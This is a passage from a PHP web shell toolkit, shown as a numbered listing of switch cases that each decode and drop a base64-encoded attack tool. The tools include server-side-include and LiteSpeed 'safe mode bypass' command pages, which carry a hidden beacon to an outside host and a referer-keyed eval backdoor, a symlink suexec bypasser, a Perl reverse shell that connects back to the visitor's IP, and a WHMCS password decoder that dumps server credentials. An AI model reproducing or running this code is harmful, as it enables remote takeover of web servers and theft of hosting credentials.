  6224.  
  6225. system("./priv9 -r izo $bports $fips");
  6226.  
  6227. break;
  6228.  
  6229. case "PHP_18":
  6230.  
  6231. mkdir('litespeed', 0755);
  6232.  
  6233. chdir('litespeed');
  6234.  
  6235. $izo = 'PHRpdGxlPkxpdGVTcGVlZCBXZWIgQnlwYXNzIC0gaXpvY2luIHByaXY5PC90aXRsZT4KICAgICAg
  6236.  
  6237. ICA8Zm9udCBmYWNlPSJXaW5nZGluZ3MiPjxpbWcgYm9yZGVyPSIwIiBzcmM9Imh0dHA6Ly9wcml2
  6238.  
  6239. OC5pYmxvZ2dlci5vcmcvcy5waHA/Jys8P2VjaG8gInVuYW1lIC1hIDogIjsgZWNobyAocGhwX3Vu
  6240.  
  6241. YW1lKCkpPz4iOyIgd2lkdGg9IjAiIGhlaWdodD0iMCI+PC9hPjwvZm9udD4KPC9mb250Pgo8Ym9k
  6242.  
  6243. eSBiZ2NvbG9yPSIjRkZGRkZGIiB0b3BtYXJnaW49IjAiIGxlZnRtYXJnaW49IjAiIHJpZ2h0bWFy
  6244.  
  6245. Z2luPSIwIiBib3R0b21tYXJnaW49IjAiIG1hcmdpbndpZHRoPSIwMCIgbWFyZ2luaGVpZ2h0PSIw
  6246.  
  6247. Ij4KCgombmJzcDs8cCBhbGlnbj0iY2VudGVyIj4KPHAgYWxpZ249ImNlbnRlciI+Jm5ic3A7PC9w
  6248.  
  6249. Pgo8cCBhbGlnbj0iY2VudGVyIj48Yj48Zm9udCBjb2xvcj0iI0ZGMDAwMCIgZmFjZT0iVGFob21h
  6250.  
  6251. Ij5SZWQtU2VjdXJpdHkgR3JvdXA8L2ZvbnQ+PC9iPjwvcD4KPHAgYWxpZ249ImNlbnRlciI+Jm5i
  6252.  
  6253. c3A7PC9wPgo8cCBhbGlnbj0iY2VudGVyIj48Zm9udCBmYWNlPSJUYWhvbWEiIHNpemU9IjQiIGNv
  6254.  
  6255. bG9yPSJncmVlbiI+PGI+TGl0ZVNwZWVkIAo8Zm9udCBjb2xvcj0iI0ZGMDAwMCI+U2FmZSBNb2Rl
  6256.  
  6257. IEJ5cGFzc2VyPC9mb250PiA8L2I+PC9mb250Pgo8L3A+CjxwIGFsaWduPSJjZW50ZXIiPiZuYnNw
  6258.  
  6259. OzwvcD4KPGZvcm0gbmFtZT0iejFkLWxpdGVzcGVlZCIgIG1ldGhvZD0icG9zdCI+CjxwIGFsaWdu
  6260.  
  6261. PSJjZW50ZXIiPjxmb250IGZhY2U9IlRhaG9tYSI+PGI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPiM8
  6262.  
  6263. L2ZvbnQ+IDwvYj5Db21tYW5kPGI+CjxzcGFuIGxhbmc9ImFyLXNhIj48Zm9udCBjb2xvcj0iI0ZG
  6264.  
  6265. MDAwMCI+fjwvZm9udD4gPC9zcGFuPiZuYnNwOzwvYj48aW5wdXQgbmFtZT0iY29tbWFuZCIgdmFs
  6266.  
  6267. dWU9ImlkIiBzdHlsZT0iYm9yZGVyOiAxcHggZG90dGVkICNGRjAwMDA7IGZvbnQtZmFtaWx5OnRh
  6268.  
  6269. IiBzaXplPSIzNiIgdGFiaW5kZXg9IjIwIj48Yj4KPC9iPiZuYnNwOyA8L2ZvbnQ+PC9wPgo8cCBh
  6270.  
  6271. bGlnbj0iY2VudGVyIj48Zm9udCBmYWNlPSJUYWhvbWEiPgo8aW5wdXQgdHlwZT0ic3VibWl0IiBu
  6272.  
  6273. YW1lPSJTdWJtaXQiIHZhbHVlPSJCYXMgRGF5aSI+PGI+CjwvYj48L2ZvbnQ+PC9wPgo8L2Zvcm0+
  6274.  
  6275. Cjxicj48YnI+PGJyPjxicj48Y2VudGVyPgo8P3BocAokY29tbWFuZCA9ICRfUE9TVFsnY29tbWFu
  6276.  
  6277. ZCddOwokejAweiA9ICRfUE9TVFsnejAweiddOwppZigkY29tbWFuZCl7CiR6MTFkID0gIjxjZW50
  6278.  
  6279. ZXI+PHByZT48cHJlPgo8YnI+ClJlZHNlY3VyaXR5LmlibG9nZ2VyLm9yZwo8YnI+Cjxicj4KPCEt
  6280.  
  6281. LSNleGVjIGNtZD0nJGNvbW1hbmQnIC0tPiAKCiI7CiRvcGVuZmlsZSA9IGZvcGVuKCJpem8uc2h0
  6282.  
  6283. bWwiLCJ3Iik7CiR3cml0ZWludG8gPSBmd3JpdGUoJG9wZW5maWxlLCIkejExZCIpOwpmY2xvc2Uo
  6284.  
  6285. JG9wZW5maWxlKTsKaWYoJG9wZW5maWxlKXsKfWVsc2V7Cn0KfQpwYXJzZV9zdHIoJF9TRVJWRVJb
  6286.  
  6287. J0hUVFBfUkVGRVJFUiddLCRhKTsgaWYocmVzZXQoJGEpPT0naXonICYmIGNvdW50KCRhKT09OSkg
  6288.  
  6289. eyBlY2hvICc8c3Rhcj4nO2V2YWwoYmFzZTY0X2RlY29kZShzdHJfcmVwbGFjZSgiICIsICIrIiwg
  6290.  
  6291. am9pbihhcnJheV9zbGljZSgkYSxjb3VudCgkYSktMykpKSkpO2VjaG8gJzwvc3Rhcj4nO30KPz4K
  6292.  
  6293. PHByZT4gCiA8aWZyYW1lIHNyYz0naXpvLnNodG1sJyAgd2lkdGg9MTAwJSBoZWlnaHQ9ODUlIGlk
  6294.  
  6295. PSJJMSIgbmFtZT0iSUYxIiA+CjwvcHJlPg==';
  6296.  
  6297.  
  6298.  
  6299. $file = fopen("ssi.php" ,"w+");
  6300.  
  6301. $write = fwrite ($file ,base64_decode($izo));
  6302.  
  6303. fclose($file);
  6304.  
  6305.  
  6306.  
  6307. echo "<iframe src=litespeed/ssi.php width=100% height=100% frameborder=0></iframe> ";
  6308.  
  6309. break;
  6310.  
  6311. case "PHP_19":
  6312.  
  6313. mkdir('ssi', 0755);
  6314.  
  6315. chdir('ssi');
  6316.  
  6317. $fp = fopen(".htaccess","w+");
  6318.  
  6319. fwrite($fp,"AddType text/html .shtml
  6320.  
  6321. AddOutputFilter INCLUDES .shtml");
  6322.  
  6323.  
  6324.  
  6325. $izo = 'PHRpdGxlPlNzaSBCeXBhc3MgMHpsZXlpY2kgU2hlbGwgMjAxMTwvdGl0bGU+CiAgICAgICAgPGZv
  6326.  
  6327. bnQgZmFjZT0iV2luZ2RpbmdzIj48aW1nIGJvcmRlcj0iMCIgc3JjPSJodHRwOi8vcHJpdjguaWJs
  6328.  
  6329. b2dnZXIub3JnL3MucGhwPycrPD9lY2hvICJ1bmFtZSAtYSA6ICI7IGVjaG8gKHBocF91bmFtZSgp
  6330.  
  6331. KT8+IjsiIHdpZHRoPSIwIiBoZWlnaHQ9IjAiPjwvYT48L2ZvbnQ+CjwvZm9udD4KPGJvZHkgYmdj
  6332.  
  6333. b2xvcj0iI0ZGRkZGRiIgdG9wbWFyZ2luPSIwIiBsZWZ0bWFyZ2luPSIwIiByaWdodG1hcmdpbj0i
  6334.  
  6335. MCIgYm90dG9tbWFyZ2luPSIwIiBtYXJnaW53aWR0aD0iMDAiIG1hcmdpbmhlaWdodD0iMCI+CgoK
  6336.  
  6337. Jm5ic3A7PHAgYWxpZ249ImNlbnRlciI+CjxwIGFsaWduPSJjZW50ZXIiPiZuYnNwOzwvcD4KPHAg
  6338.  
  6339. YWxpZ249ImNlbnRlciI+PGI+PGZvbnQgY29sb3I9IiNGRjAwMDAiIGZhY2U9IlRhaG9tYSI+UmVk
  6340.  
  6341. LVNlY3VyaXR5IEdyb3VwPC9mb250PjwvYj48L3A+CjxwIGFsaWduPSJjZW50ZXIiPiZuYnNwOzwv
  6342.  
  6343. cD4KPHAgYWxpZ249ImNlbnRlciI+PGZvbnQgZmFjZT0iVGFob21hIiBzaXplPSI0IiBjb2xvcj0i
  6344.  
  6345. Z3JlZW4iPjxiPlNzaSAKPGZvbnQgY29sb3I9IiNGRjAwMDAiPlNhZmUgTW9kZSBCeXBhc3Nlcjwv
  6346.  
  6347. Zm9udD4gPC9iPjwvZm9udD4KPC9wPgo8cCBhbGlnbj0iY2VudGVyIj4mbmJzcDs8L3A+Cjxmb3Jt
  6348.  
  6349. IG5hbWU9InoxZC1saXRlc3BlZWQiICBtZXRob2Q9InBvc3QiPgo8cCBhbGlnbj0iY2VudGVyIj48
  6350.  
  6351. Zm9udCBmYWNlPSJUYWhvbWEiPjxiPjxmb250IGNvbG9yPSIjRkYwMDAwIj4jPC9mb250PiA8L2I+
  6352.  
  6353. Q29tbWFuZDxiPgo8c3BhbiBsYW5nPSJhci1zYSI+PGZvbnQgY29sb3I9IiNGRjAwMDAiPn48L2Zv
  6354.  
  6355. bnQ+IDwvc3Bhbj4mbmJzcDs8L2I+PGlucHV0IG5hbWU9ImNvbW1hbmQiIHZhbHVlPSJpZCIgc3R5
  6356.  
  6357. bGU9ImJvcmRlcjogMXB4IGRvdHRlZCAjRkYwMDAwOyBmb250LWZhbWlseTp0YSIgc2l6ZT0iMzYi
  6358.  
  6359. IHRhYmluZGV4PSIyMCI+PGI+CjwvYj4mbmJzcDsgPC9mb250PjwvcD4KPHAgYWxpZ249ImNlbnRl
  6360.  
  6361. ciI+PGZvbnQgZmFjZT0iVGFob21hIj4KPGlucHV0IHR5cGU9InN1Ym1pdCIgbmFtZT0iU3VibWl0
  6362.  
  6363. IiB2YWx1ZT0iQmFzIERheWkiPjxiPgo8L2I+PC9mb250PjwvcD4KPC9mb3JtPgo8YnI+PGJyPjxi
  6364.  
  6365. cj48YnI+PGNlbnRlcj4KPD9waHAKJGNvbW1hbmQgPSAkX1BPU1RbJ2NvbW1hbmQnXTsKJHowMHog
  6366.  
  6367. PSAkX1BPU1RbJ3owMHonXTsKaWYoJGNvbW1hbmQpewokejExZCA9ICI8Y2VudGVyPjxwcmU+PHBy
  6368.  
  6369. ZT4KPGJyPgpSZWRzZWN1cml0eS5pYmxvZ2dlci5vcmcKPGJyPgo8YnI+CjwhLS0jZXhlYyBjbWQ9
  6370.  
  6371. JyRjb21tYW5kJyAtLT4gCgoiOwokb3BlbmZpbGUgPSBmb3BlbigiaXpvLnNodG1sIiwidyIpOwok
  6372.  
  6373. d3JpdGVpbnRvID0gZndyaXRlKCRvcGVuZmlsZSwiJHoxMWQiKTsKZmNsb3NlKCRvcGVuZmlsZSk7
  6374.  
  6375. CmlmKCRvcGVuZmlsZSl7Cn1lbHNlewp9Cn0KcGFyc2Vfc3RyKCRfU0VSVkVSWydIVFRQX1JFRkVS
  6376.  
  6377. RVInXSwkYSk7IGlmKHJlc2V0KCRhKT09J2l6JyAmJiBjb3VudCgkYSk9PTkpIHsgZWNobyAnPHN0
  6378.  
  6379. YXI+JztldmFsKGJhc2U2NF9kZWNvZGUoc3RyX3JlcGxhY2UoIiAiLCAiKyIsIGpvaW4oYXJyYXlf
  6380.  
  6381. c2xpY2UoJGEsY291bnQoJGEpLTMpKSkpKTtlY2hvICc8L3N0YXI+Jzt9Cj8+CjxwcmU+IAogPGlm
  6382.  
  6383. cmFtZSBzcmM9J2l6by5zaHRtbCcgIHdpZHRoPTEwMCUgaGVpZ2h0PTg1JSBpZD0iSTEiIG5hbWU9
  6384.  
  6385. IklGMSIgPgo8L3ByZT4=';
  6386.  
  6387.  
  6388.  
  6389. $file = fopen("ssi.php" ,"w+");
  6390.  
  6391. $write = fwrite ($file ,base64_decode($izo));
  6392.  
  6393. fclose($file);
  6394.  
  6395.  
  6396.  
  6397. echo "<iframe src=ssi/ssi.php width=100% height=100% frameborder=0></iframe> ";
  6398.  
  6399. break;
  6400.  
  6401. case "PHP_20":
  6402.  
  6403. mkdir('suexec', 0777);
  6404.  
  6405. chdir('suexec');
  6406.  
  6407.  
  6408.  
  6409. $izodayi = 'PGh0bWw+IAo8Ym9keSBiZ2NvbG9yPSIwMDAwMDAwIj4gCjx0aXRsZT5zeW1saW5rPC90aXRsZT4g
  6410.  
  6411. CjxjZW50ZXI+PGI+PGgyPjxmb250IGNvbG9yPSJyZWQiPiBTVUVYRSBCeXBhc3NlciBWaWEgU3lt
  6412.  
  6413. bGluayAoViAxLjAxKTwvZm9udD48L2JyPjwvY2VudGVyPjwvYj48L2gyPiAKPGNlbnRlcj48Yj48
  6414.  
  6415. aDQ+PGZvbnQgY29sb3I9InJlZCI+V0lUSCBUSElTIFNDUklQVCBVIENBTiBVU0UgU1lNTElOSyBJ
  6416.  
  6417. TiAyIE1FVEhPRHM8L2ZvbnQ+PC9icj48L2NlbnRlcj48L2I+PC9oND4gCjxjZW50ZXI+PGI+PGg0
  6418.  
  6419. Pjxmb250IGNvbG9yPSJ3aGl0ZSI+RGVzdCA9IERlc3RlbmF0aW9uIE9mIFBhdGggb3IgZmlsZSBU
  6420.  
  6421. aGF0IHUgV2FudCB0byBTeW1saW5rIEl0PC9mb250PjwvYnI+PC9jZW50ZXI+PC9iPjwvaDQ+IAo8
  6422.  
  6423. Y2VudGVyPjxiPjxoND48Zm9udCBjb2xvcj0id2hpdGUiPm5hbWUgOiBGaWxlIE5hbWUgVGhhdCB1
  6424.  
  6425. IFdhbnQgVG8gY3JlYXRlIGluIChbcGF0aF0vc21sbmspPC9mb250PjwvYnI+PC9jZW50ZXI+PC9i
  6426.  
  6427. PjwvaDQ+IAo8Y2VudGVyPjxiPjxoND48Zm9udCBjb2xvcj0id2hpdGUiPlVwbG9hZCBUaGlzIFNj
  6428.  
  6429. cmlwdCBJbiBGdWxsIFNVRVhFIG9yIEZ1bGxQZXJtIERpcmVjdG9yeTwvZm9udD48L2JyPjwvY2Vu
  6430.  
  6431. dGVyPjwvYj48L2g0PiAKPGNlbnRlcj48Yj48aDQ+PGZvbnQgY29sb3I9IndoaXRlIj5Xcml0dGVu
  6432.  
  6433. IEZvciAqTklYIFBsYXRmb3JtczwvZm9udD48L2JyPjwvY2VudGVyPjwvYj48L2g0PiAKPC9odG1s
  6434.  
  6435. PiAKCjw/cGhwIAovL0NPREVEIEJZIElSQU4gCi8vZm9ybSBkZWZpbmluZyAKcHJpbnQgIjxmb3Jt
  6436.  
  6437. IG1ldGhvZD1wb3N0PiI7IApwcmludCAiPGNlbnRlcj48Zm9udCBjb2xvcj1ncmVlbj4iOyAKcHJp
  6438.  
  6439. bnQgIjxiPmRlc3QgOjwvYj48aW5wdXQgc2l6ZT01MCBuYW1lPSdkZXN0ZW5hdGlvbicgdmFsdWU9
  6440.  
  6441. Jyc+IjsgCnByaW50ICI8YnI+IjsgCnByaW50ICI8Yj5uYW1lIDo8L2I+PGlucHV0IHNpemU9NTAg
  6442.  
  6443. bmFtZT0nbmFtZScgdmFsdWU9Jyc+IjsgCnByaW50ICI8YnI+IjsgCnByaW50ICI8aW5wdXQgdHlw
  6444.  
  6445. ZT1zdWJtaXQgbmFtZT1fYWN0IHZhbHVlPSdDcmVhdGUhJz4iOyAKcHJpbnQgIjwvY2VudGVyPjwv
  6446.  
  6447. Zm9udD4iOyAKJGRlc3QgPSAkX1BPU1RbJ2Rlc3RlbmF0aW9uJ107IAokZGVzdG5hbWUgPSAkX1BP
  6448.  
  6449. U1RbJ25hbWUnXTsgCj8+IAoKPD9waHAgCi8vZGVmaW5pbmcgdmFyaWFibGVzIAokZGlyID0gZGly
  6450.  
  6451. bmFtZSgkX1NFUlZFUltTQ1JJUFRfRklMRU5BTUVdKS4iL3NtbG5rIjsgCiRhY2MgPSAkZGlyLiIv
  6452.  
  6453. Lmh0YWNlZXNzIjsgCiRjbWQgPSAibG4gLXMiLmNocigzMikuJGRlc3QuY2hyKDMyKS4kc3ltOyAK
  6454.  
  6455. JHN5bSA9ICRkaXIuIi8iLiRkZXN0bmFtZTsgCiRodGFjY2VzcyA9ICAKIk9wdGlvbnMgK0ZvbGxv
  6456.  
  6457. d1N5bUxpbmtzIi5jaHIoMDA5KS4gCiJEaXJlY3RvcnlJbmRleCBzZWVlcy5odG1sIi5jaHIoMDA5
  6458.  
  6459. KS4gCiJSZW1vdmVIYW5kbGVyIC5waHAiLmNocigwMDkpLiAKIkFkZFR5cGUgYXBwbGljYXRpb24v
  6460.  
  6461. b2N0ZXQtc3RyZWFtIC5waHAiOyAKCmlmICghZmlsZV9leGlzdHMoJGRpcikpIHsgCm1rZGlyICgk
  6462.  
  6463. ZGlyKTsgCn0gIApzbGVlcCgxKTsgCmlmICghZmlsZV9leGlzdHMoJGFjYykpIHsgCiRoYW5kbGUg
  6464.  
  6465. PSBmb3BlbiggIiRhY2MiICwgJ2ErJyApOyAKZnB1dHMoICRoYW5kbGUgLCAgIiRodGFjY2VzcyIg
  6466.  
  6467. KTsgCn0gIAo/PiAKCjw/cGhwIAovL2NoZWNrIG1ldGhvZCAKaWYgKGZ1bmN0aW9uX2V4aXN0cyAo
  6468.  
  6469. ZXhlYykgT1IgZnVuY3Rpb25fZXhpc3RzIChzaGVsbF9leGVjKSBPUiBmdW5jdGlvbl9leGlzdHMg
  6470.  
  6471. KHN5c3RlbSkgT1IgZnVuY3Rpb25fZXhpc3RzIChwYXNzdGhydSkpIHsgCiRjaGVjayA9IDE7IAp9
  6472.  
  6473. ZWxzZXsgCiRjaGVjayA9IDA7IAp9IAppZihmdW5jdGlvbl9leGlzdHMgKHN5bWxpbmspKSB7IAok
  6474.  
  6475. Y2hlY2tzID0gMTsgCn1lbHNleyAKJGNoZWNrcyA9IDA7IAp9IAo/PiAKCjw/cGhwIAovL2RlZmlu
  6476.  
  6477. ZSBjb21tYW5kIGZ1bmN0aW9uIAokcmVzYXVsdCA9ICcnOyAgCmZ1bmN0aW9uIGNvbW1hbmQoJGNt
  6478.  
  6479. ZGUpIHsgCiAgICBpZiAoIWVtcHR5KCRjbWRlKSkgIAogeyAgCmlmIChmdW5jdGlvbl9leGlzdHMo
  6480.  
  6481. J2V4ZWMnKSkgeyAkcmVzYXVsdCA9IEBleGVjKCRjbWRlKTsgfSAgCmVsc2VpZiAoZnVuY3Rpb25f
  6482.  
  6483. ZXhpc3RzKCdzaGVsbF9leGVjJykpIHsgJHJlc2F1bHQgPSBAc2hlbGxfZXhlYygkY21kZSk7IH0g
  6484.  
  6485. IAplbHNlaWYgKGZ1bmN0aW9uX2V4aXN0cygnc3lzdGVtJykpIHsgJHJlc2F1bHQgPSBAc3lzdGVt
  6486.  
  6487. KCRjbWRlKTsgfSAgCmVsc2VpZiAoZnVuY3Rpb25fZXhpc3RzKCdwYXNzdGhydScpKSB7ICRyZXNh
  6488.  
  6489. dWx0ID0gQHBhc3N0aHJ1KCRjbWRlKTsgfSAgCiB9IApyZXR1cm4gJHJlc2F1bHQ7IAp9IAo/PiAK
  6490.  
  6491. Cjw/cGhwIAovL2V4ZWN1dGlvbiAKaWYgKCRjaGVjayA9PTEgJiYgJGNoZWNrcyA9PTEpeyBjb21t
  6492.  
  6493. YW5kICgkY21kKTsgfSAKZWxzZWlmICgkY2hlY2sgPT0xICYmICRjaGVja3MgPT0wKXsgY29tbWFu
  6494.  
  6495. ZCAoJGNtZCk7IH0gCmVsc2VpZiAoJGNoZWNrID09MCAmJiAkY2hlY2tzID09MSkgeyBzeW1saW5r
  6496.  
  6497. ICgkZGVzdCwkc3ltKTsgfSAKZWxzZWlmICgkY2hlY2sgPT0wICYmICRjaGVja3MgPT0wKSAgCnsg
  6498.  
  6499. IApwcmludCAoIjxjZW50ZXI+PGZvbnQgY29sb3I9Z3JlZW4+PGgxPnNjcmlwdCBkb2VzbnQgd29y
  6500.  
  6501. ayBmb3IgdGhpcyBzZXJ2ZXI8L2ZvbnQ+PC9oMT48L2NlbnRlcj4iKTsgIAp9IAo/PiAKPD9waHAg
  6502.  
  6503. Ci8vaXMgc2FmZSBtb2Qgb24gPyBzdGFydCAKaWYgKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSBvciBz
  6504.  
  6505. dHJ0b2xvd2VyKEBpbmlfZ2V0KCJzYWZlX21vZGUiKSkgPT0gIm9uIikgIAp7ICAKJHNhZmU9Ijxm
  6506.  
  6507. b250IGNvbG9yPXJlZD5PTjwvZm9udD4iOyAKfSAgCmVsc2UgeyRzYWZlPSI8Zm9udCBjb2xvcj1n
  6508.  
  6509. cmVlbj5PRkY8L2ZvbnQ+Ijt9IAplY2hvICI8Zm9udCBjb2xvcj13aGl0ZXB1cnBsZT5TQUZFIE1P
  6510.  
  6511. RCBJUyA6PC9mb250PjxiPiRzYWZlPC9iPjxicj4iOyAKLy9vcGVuIHNhZmUgbW9kIGVuZC0tIAo/
  6512.  
  6513. PiAgCjw/cGhwIAovL2Rpc2FibGUgZnVuY3Rpb24gc3RhcnQgCmVjaG8gIjxmb250IGNvbG9yPXdo
  6514.  
  6515. aXRlcHVycGxlPkRpc2FibGUgZnVuY3Rpb25zIDo8L2ZvbnQ+IDxiPiI7IAppZignJz09KCRkZj1A
  6516.  
  6517. aW5pX2dldCgnZGlzYWJsZV9mdW5jdGlvbnMnKSkpe2VjaG8gIjxmb250IGNvbG9yPWdyZWVuPk5P
  6518.  
  6519. TkU8L2ZvbnQ+PC9iPiI7fWVsc2V7ZWNobyAiPGZvbnQgY29sb3I9cmVkPiRkZjwvZm9udD48L2I+
  6520.  
  6521. Ijt9IAovL2Rpc2FibGUgZnVuY3Rpb24gZW5kLS0gCj8+';
  6522.  
  6523.  
  6524.  
  6525. $file = fopen("suexec.php" ,"w+");
  6526.  
  6527. $write = fwrite ($file ,base64_decode($izodayi));
  6528.  
  6529. fclose($file);
  6530.  
  6531.  
  6532.  
  6533. echo "<iframe src=suexec/suexec.php width=100% height=100% frameborder=0></iframe> ";
  6534.  
  6535. break;
  6536.  
  6537. case "PHP_21":
  6538.  
  6539. # coded by izo
  6540.  
  6541. {
  6542.  
  6543. print "Ba&#287;lan&#305;l&#305;yor...\n";
  6544.  
  6545. $fippi=$_SERVER["REMOTE_ADDR"];
  6546.  
  6547. $bpci="22";
  6548.  
  6549. $izocinx = 'ICAgICMhL3Vzci9iaW4vcGVybAogICAgIAogICAgICAgIHVzZSBTb2NrZXQ7CiAgICAgICAgJGMw
  6550.  
  6551. ZGUgPSAkQVJHVlswXTsKICAgICAgICAkYWFhYSA9ICRBUkdWWzFdOwogICAgICAgICAgaWYgKCEk
  6552.  
  6553. QVJHVlswXSkgewogICAgICAgICAgcHJpbnRmICIjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
  6554.  
  6555. IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjI1xuIjsKICAgICAgICAgIHByaW50ZiAiIyMj
  6556.  
  6557. IyMjU2ltcGxlIEJhY2sgQ29ubmVjdCBDb2RlZCBCeSBjMGRlLCBCSGFjayBtZW1iZXIjIyMjIyNc
  6558.  
  6559. biI7CiAgICAgICAgICBwcmludGYgIiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj
  6560.  
  6561. IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjXG4iOwogICAgICAgICAgcHJpbnRmICIjIyMjIyMjIyMj
  6562.  
  6563. I1VzYWdlOiBJUCBQb3J0IHwgRXguIDEyNy4wLjAuMSA4ODg4IyMjIyMjIyMjIyMjI1xuIjsKICAg
  6564.  
  6565. ICAKICAgICAgICAgIGV4aXQoMSk7CiAgICAgICAgfQogICAgICAgIHByaW50ICJDb25uZWN0aW5n
  6566.  
  6567. IHRvICRjMGRlXG4iOwogICAgICAgICRiYWxjYW4gPSBnZXRwcm90b2J5bmFtZSgndGNwJyk7CiAg
  6568.  
  6569. ICAgICAgc29ja2V0KFNFUlZFUiwgUEZfSU5FVCwgU09DS19TVFJFQU0sICRiYWxjYW4pIHx8IGRp
  6570.  
  6571. ZSAoIkVycjByIHdoZW4gdHJ5aW5nIHRvIGNvbm5lY3QgIFtjaGVjayBJUDpQb3J0XSIpOwogICAg
  6572.  
  6573. ICAgIGlmICghY29ubmVjdChTRVJWRVIsIHBhY2sgIlNuQTR4OCIsIDIsICRhYWFhLCBpbmV0X2F0
  6574.  
  6575. b24oJGMwZGUpKSkge2RpZSgiRXJyMHIgd2hlbiB0cnlpbmcgdG8gY29ubmVjdCAgW2NoZWNrIElQ
  6576.  
  6577. OlBvcnRdICIpO30KICAgICAKICAgICAgICAgIG9wZW4oU1RESU4sIj4mU0VSVkVSIik7CiAgICAg
  6578.  
  6579. ICAgICBvcGVuKFNURE9VVCwiPiZTRVJWRVIiKTsKICAgICAgICAgIG9wZW4oU1RERVJSLCI+JlNF
  6580.  
  6581. UlZFUiIpOwogICAgICAgICAgZXhlYyB7Jy9iaW4vc2gnfSAnLWJhc2gnIC4gIlwwIiB4IDQ7';
  6582.  
  6583. $file = fopen("dayi" ,"w+");
  6584.  
  6585. $write = fwrite ($file ,base64_decode($izocinx));
  6586.  
  6587. fclose($file);
  6588.  
  6589. chmod("dayi" , 0777);
  6590.  
  6591. system("perl dayi $fippi $bpci");
  6592.  
  6593. }
  6594.  
  6595. break;
  6596.  
  6597. case "PHP_23":
  6598.  
  6599. eval(base64_decode("IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyAgICAgIFdITUNTIFNlcnZlciBQYXNzd29yZCBkZWNvZGVyICAgICAgICMNCiMgICAgICBDb2RlZCBCeSBSQUIzT1VOICAgICAgICAgICAgICAgICAgICAjDQojICAgICAgICAgIHYuYi00QGhvdG1haWwuY29tICAgICAgICAgICAgICAgIw0KI05vdGUgOiBJJ20gUHJvdWQgdG8gYmUgfn5UVU5JU0lBTn5+ICAgICAgICMgIA0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KDQoNCg0KZnVuY3Rpb24gZGVjcnlwdCAoJHN0cmluZywkY2NfZW5jcnlwdGlvbl9oYXNoKQ0Kew0KDQoJJGtleSA9IG1kNSAobWQ1ICgkY2NfZW5jcnlwdGlvbl9oYXNoKSkgLiBtZDUgKCRjY19lbmNyeXB0aW9uX2hhc2gpOw0KCSRoYXNoX2tleSA9IF9oYXNoICgka2V5KTsNCgkkaGFzaF9sZW5ndGggPSBzdHJsZW4gKCRoYXNoX2tleSk7DQoJJHN0cmluZyA9IGJhc2U2NF9kZWNvZGUgKCRzdHJpbmcpOw0KCSR0bXBfaXYgPSBzdWJzdHIgKCRzdHJpbmcsIDAsICRoYXNoX2xlbmd0aCk7DQoJJHN0cmluZyA9IHN1YnN0ciAoJHN0cmluZywgJGhhc2hfbGVuZ3RoLCBzdHJsZW4gKCRzdHJpbmcpIC0gJGhhc2hfbGVuZ3RoKTsNCgkkaXYgPSAkb3V0ID0gJyc7DQoJJGMgPSAwOw0KCXdoaWxlICgkYyA8ICRoYXNoX2xlbmd0aCkNCgl7DQoJCSRpdiAuPSBjaHIgKG9yZCAoJHRtcF9pdlskY10pIF4gb3JkICgkaGFzaF9rZXlbJGNdKSk7DQoJCSsrJGM7DQoJfQ0KDQoJJGtleSA9ICRpdjsNCgkkYyA9IDA7DQoJd2hpbGUgKCRjIDwgc3RybGVuICgkc3RyaW5nKSkNCgl7DQoJCWlmICgoJGMgIT0gMCBBTkQgJGMgJSAkaGFzaF9sZW5ndGggPT0gMCkpDQoJCXsNCgkJCSRrZXkgPSBfaGFzaCAoJGtleSAuIHN1YnN0ciAoJG91dCwgJGMgLSAkaGFzaF9sZW5ndGgsICRoYXNoX2xlbmd0aCkpOw0KCQl9DQoNCgkJJG91dCAuPSBjaHIgKG9yZCAoJGtleVskYyAlICRoYXNoX2xlbmd0aF0pIF4gb3JkICgkc3RyaW5nWyRjXSkpOw0KCQkrKyRjOw0KCX0NCg0KCXJldHVybiAkb3V0Ow0KfQ0KDQoNCmZ1bmN0aW9uIF9oYXNoICgkc3RyaW5nKQ0Kew0KCWlmIChmdW5jdGlvbl9leGlzdHMgKCdzaGExJykpDQoJew0KCQkkaGFzaCA9IHNoYTEgKCRzdHJpbmcpOw0KCX0NCgllbHNlDQoJew0KCQkkaGFzaCA9IG1kNSAoJHN0cmluZyk7DQoJfQ0KDQoJJG91dCA9ICcnOw0KCSRjID0gMDsNCgl3aGlsZSAoJGMgPCBzdHJsZW4gKCRoYXNoKSkNCgl7DQoJCSRvdXQgLj0gY2hyIChoZXhkZWMgKCRoYXNoWyRjXSAuICRoYXNoWyRjICsgMV0pKTsNCgkJJGMgKz0gMjsNCgl9DQoNCglyZXR1cm4gJG91dDsNCn0NCg0KIGlmKCRfUE9TVFsnZm9ybV9hY3Rpb24nXSA9PSAxICkNCiB7DQogLy9pbmNsdWRlKCRmaWxlKTsNCg0KICRmaWxlPSgkX1BPU1RbJ2ZpbGUnXSk7DQokdGV4dD1maWxlX2dldF9jb250ZW50cygkZmlsZSk7DQoNCiR0ZXh0PSBzdHJfcmVwbGFjZSgiPD9waHAiLCAiIiwgJHRleHQpOw0KJHRleHQ9IHN0cl9yZXBsYWNlKCI8PyIsICIiLCAkdGV4dCk7DQokdGV4dD0gc3RyX3JlcGxhY2UoIj8+IiwgIiIsICR0ZXh0KTsNCg0KZXZhbCgkdGV4dCk7DQoNCiAgICAkbGluaz1teXNxbF9jb25uZWN0KCRkYl9ob3N0LCRkYl91c2VybmFtZSwkZGJfcGFzc3dvcmQpIDsNCgkgICAgbXlzcWxfc2VsZWN0X2RiKCRkYl9uYW1lLCRsaW5rKSA7DQoNCiRxdWVyeSA9IG15c3FsX3F1ZXJ5KCJTRUxFQ1QgKiBGUk9NIHRibHNlcnZlcnMiKTsNCg0Kd2hpbGUoJHYgPSBteXNxbF9mZXRjaF9hcnJheSgkcXVlcnkpKSB7DQoNCiRpcGFkZHJlc3MgPSAkdlsnaXBhZGRyZXNzJ107DQokdXNlcm5hbWUgPSAkdlsndXNlcm5hbWUnXTsNCiR0eXBlID0gJHZbJ3R5cGUnXTsNCiRhY3RpdmUgPSAkdlsnYWN0aXZlJ107DQokaG9zdG5hbWUgPSAkdlsnaG9zdG5